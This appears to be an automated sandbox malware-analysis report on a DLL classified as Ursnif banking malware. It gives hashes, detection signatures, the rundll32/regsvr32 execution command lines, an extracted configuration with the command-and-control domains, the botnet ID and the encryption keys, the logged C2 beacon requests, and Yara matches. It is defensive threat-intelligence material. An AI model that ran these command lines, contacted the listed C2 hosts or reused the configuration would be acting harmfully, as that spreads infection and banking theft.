Loading ...

Play interactive tourEdit tour

Windows Analysis Report 9091.dll

Overview

General Information

Sample Name:9091.dll
Analysis ID:548724
MD5:8cef4bb6ea32fc461e3a954500413512
SHA1:d0612a06f724ebdb72db009010207c929aac9007
SHA256:6a455667f74c818d5e20a83af8ba5eb8022b1714ceb9302c2b7f7f4ea1a141c9
Tags:dllexeZloader
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Sigma detected: Suspicious Call by Ordinal
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Registers a DLL
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4908 cmdline: loaddll32.exe "C:\Users\user\Desktop\9091.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 1364 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5032 cmdline: rundll32.exe "C:\Users\user\Desktop\9091.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 2332 cmdline: regsvr32.exe /s C:\Users\user\Desktop\9091.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 6008 cmdline: rundll32.exe C:\Users\user\Desktop\9091.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "aScpE7CilQ9VtygBXbwXm3cD296yz+RssVO+4h8dSJN8SwshLOZQ8SH7VEx70uuWiFjdqr+uklWJF/baQZUtCK4Bm7884qZ6qhDkBdiQK8V2zH0dHiFpHhB//0WN950qgmnuJAQbYHO78/vC+UGIVbVNILi+zFGHaDdiP/Ka/IdBmgobFFhN6+VD656EnLLJ", "c2_domain": ["google.mail.com", "firsone1.online", "kdsjdsadas.online"], "botnet": "9091", "server": "12", "serpent_key": "01026655AALLKENM", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000002.797837616.00000000047E9000.00000004.00000040.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 47 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.loaddll32.exe.990000.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              5.2.rundll32.exe.10000000.3.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                4.2.rundll32.exe.4400000.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  4.2.rundll32.exe.10000000.3.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    5.2.rundll32.exe.ba0000.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 19 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\9091.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\9091.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1364, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\9091.dll",#1, ProcessId: 5032

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000000.00000002.795901018.0000000000990000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "aScpE7CilQ9VtygBXbwXm3cD296yz+RssVO+4h8dSJN8SwshLOZQ8SH7VEx70uuWiFjdqr+uklWJF/baQZUtCK4Bm7884qZ6qhDkBdiQK8V2zH0dHiFpHhB//0WN950qgmnuJAQbYHO78/vC+UGIVbVNILi+zFGHaDdiP/Ka/IdBmgobFFhN6+VD656EnLLJ", "c2_domain": ["google.mail.com", "firsone1.online", "kdsjdsadas.online"], "botnet": "9091", "server": "12", "serpent_key": "01026655AALLKENM", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 9091.dllVirustotal: Detection: 22%Perma Link
                      Source: 9091.dllReversingLabs: Detection: 30%
                      Machine Learning detection for sampleShow sources
                      Source: 9091.dllJoe Sandbox ML: detected
                      Source: 3.2.regsvr32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 5.2.rundll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 4.2.rundll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 0.2.loaddll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 9091.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: unknownHTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49803 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49811 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49812 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49813 version: TLS 1.2

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 134.0.117.195 187Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: google.mail.com
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: firsone1.online
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: kdsjdsadas.online
                      Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: global trafficHTTP traffic detected: GET /jkloll/gfrPkOjYD/LcWirUQZbFxpai_2Bx8v/N7vD_2B_2FH5uEzDoVv/7dpgwOBiuXHqM667wEqs_2/BsKhITLbECD_2/BrsCuZOH/9inDS3N_2BAw6xzSFVI4I3r/K9MZrdcrj9/apJueAkO6z3aFPMvl/1u8BPeULfl0I/HXQ5umECQED/KqvCLcJ4CKU902/Ue_2BCWirDHmDgB_2FqvO/givATx4gqqgglwS7/v4BEhQLSTM_2B/_2Fe_2Bu.mki HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: firsone1.onlineConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jkloll/5uYUQ_2FQN86iHNY49L/DPZD3ITzlDFx_2FKNcjDOh/yQZWvL_2BsZuR/HjaAog4G/r_2B0Neng3bSSbmoFIlXYWw/KZfLo5Aq9a/AVLYw7N9qXQVRr8XS/UyotZ_2BKl95/LDReSgxNZCB/ot3ANBI_2Bmf2Z/wTO_2FRZveJAMYt1OAKW1/qd_2B_2BejnLQISw/xnKbO7DZ_2BFAtS/sbOL_2FiP79J/M.mki HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: firsone1.onlineConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu55m7X/keTVHZUts/0VdexVHBIDjPgfNBu0uT/PguFQeLj5VBY4GnMnUK/UA0cB1h_2F_2BMAAiPyhOY/5Iw7z41oIrnZb/4nW_2Ff2/TobIBfFnKF4Ggs861byzcAY/C9cxP76_2B/WGhxpkLq_2Fup2HWB/_2BU22RdSz/9MAm9.mki HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: firsone1.onlineConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jkloll/M6Ph7XVMuIVnQJ918dgP/iGy5ZNMffw4qd2BD6Nw/xbvKMlzJtC6XNowbd_2FKm/UnXnZNKrDT7Gw/3YWrqGQ_/2BiRpEYdm3L3qPwkGvjzy_2/FMNOIyI3KK/TIH3Ipp58a4osBqNi/vURpkVVskEDy/A_2BcLgra2r/_2BirjcwqYwgZh/tXOQJ7uW2wVdt9rR3elhH/xJqL8can/GFbQ.mki HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: firsone1.onlineConnection: Keep-AliveCache-Control: no-cache
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jan 2022 10:52:39 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16Content-Length: 460Connection: closeContent-Type: text/html; charset=iso-8859-1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jan 2022 10:52:41 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16Content-Length: 437Connection: closeContent-Type: text/html; charset=iso-8859-1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jan 2022 10:52:42 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16Content-Length: 449Connection: closeContent-Type: text/html; charset=iso-8859-1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jan 2022 10:52:46 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16Content-Length: 424Connection: closeContent-Type: text/html; charset=iso-8859-1
                      Source: loaddll32.exe, 00000000.00000003.484041107.0000000000AC5000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: 9091.dllString found in binary or memory: http://www.symantec.com
                      Source: loaddll32.exe, 00000000.00000003.484055973.0000000000ADA000.00000004.00000001.sdmpString found in binary or memory: https://firsone1.online/jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu5
                      Source: loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmpString found in binary or memory: https://google.mail.com/jkloll/SrOhqn0MT2IAkG_2B4u/QUT97q1sQV0r5x6X8tk4tl/QK7oXiqO2sMkr/Uet1eMX4/DBd
                      Source: loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmpString found in binary or memory: https://kdsjdsadas.online/
                      Source: loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmpString found in binary or memory: https://kdsjdsadas.online/jkloll/n1yCX1bWO/IyJVfm7yH8jH38Bki7vn/f4C45hYEgppc8I7zVra/TaacUzdsuPU7_2Bk
                      Source: unknownDNS traffic detected: queries for: google.mail.com
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D45988 ResetEvent,ResetEvent,lstrcat,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,0_2_00D45988
                      Source: global trafficHTTP traffic detected: GET /jkloll/gfrPkOjYD/LcWirUQZbFxpai_2Bx8v/N7vD_2B_2FH5uEzDoVv/7dpgwOBiuXHqM667wEqs_2/BsKhITLbECD_2/BrsCuZOH/9inDS3N_2BAw6xzSFVI4I3r/K9MZrdcrj9/apJueAkO6z3aFPMvl/1u8BPeULfl0I/HXQ5umECQED/KqvCLcJ4CKU902/Ue_2BCWirDHmDgB_2FqvO/givATx4gqqgglwS7/v4BEhQLSTM_2B/_2Fe_2Bu.mki HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: firsone1.onlineConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jkloll/5uYUQ_2FQN86iHNY49L/DPZD3ITzlDFx_2FKNcjDOh/yQZWvL_2BsZuR/HjaAog4G/r_2B0Neng3bSSbmoFIlXYWw/KZfLo5Aq9a/AVLYw7N9qXQVRr8XS/UyotZ_2BKl95/LDReSgxNZCB/ot3ANBI_2Bmf2Z/wTO_2FRZveJAMYt1OAKW1/qd_2B_2BejnLQISw/xnKbO7DZ_2BFAtS/sbOL_2FiP79J/M.mki HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: firsone1.onlineConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu55m7X/keTVHZUts/0VdexVHBIDjPgfNBu0uT/PguFQeLj5VBY4GnMnUK/UA0cB1h_2F_2BMAAiPyhOY/5Iw7z41oIrnZb/4nW_2Ff2/TobIBfFnKF4Ggs861byzcAY/C9cxP76_2B/WGhxpkLq_2Fup2HWB/_2BU22RdSz/9MAm9.mki HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: firsone1.onlineConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jkloll/M6Ph7XVMuIVnQJ918dgP/iGy5ZNMffw4qd2BD6Nw/xbvKMlzJtC6XNowbd_2FKm/UnXnZNKrDT7Gw/3YWrqGQ_/2BiRpEYdm3L3qPwkGvjzy_2/FMNOIyI3KK/TIH3Ipp58a4osBqNi/vURpkVVskEDy/A_2BcLgra2r/_2BirjcwqYwgZh/tXOQJ7uW2wVdt9rR3elhH/xJqL8can/GFbQ.mki HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: firsone1.onlineConnection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49803 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49811 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49812 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49813 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439767410.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438346366.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433186637.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448445867.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433125624.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448406927.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438314861.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439730823.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433150946.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433232382.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798374776.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448351506.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439792017.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439887560.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438169523.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438331806.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448474964.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433256669.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433093104.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439905362.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433269351.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448483384.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438296466.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439867059.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797510932.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439827039.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439848821.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798106316.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438266295.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448428236.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438216608.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448381234.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6008, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.ba0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.a80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2b694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.2bd0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.46d94a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.4a994a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.46d94a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2b694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4a40000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.4a994a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.d40000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47e94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.797837616.00000000047E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.795901018.0000000000990000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797295026.0000000002B69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.798529500.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.795928637.0000000000A80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.796340255.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798181911.00000000046D9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.797710008.0000000004400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798351348.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798497438.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798052757.0000000004A99000.00000004.00000040.sdmp, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439767410.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438346366.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433186637.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448445867.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433125624.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448406927.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438314861.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439730823.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433150946.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433232382.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798374776.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448351506.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439792017.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439887560.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438169523.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438331806.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448474964.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433256669.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433093104.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439905362.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433269351.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448483384.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438296466.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439867059.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797510932.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439827039.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439848821.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798106316.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438266295.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448428236.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438216608.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448381234.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6008, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4400000.0.raw.unpack, type: UNPACKEDPE
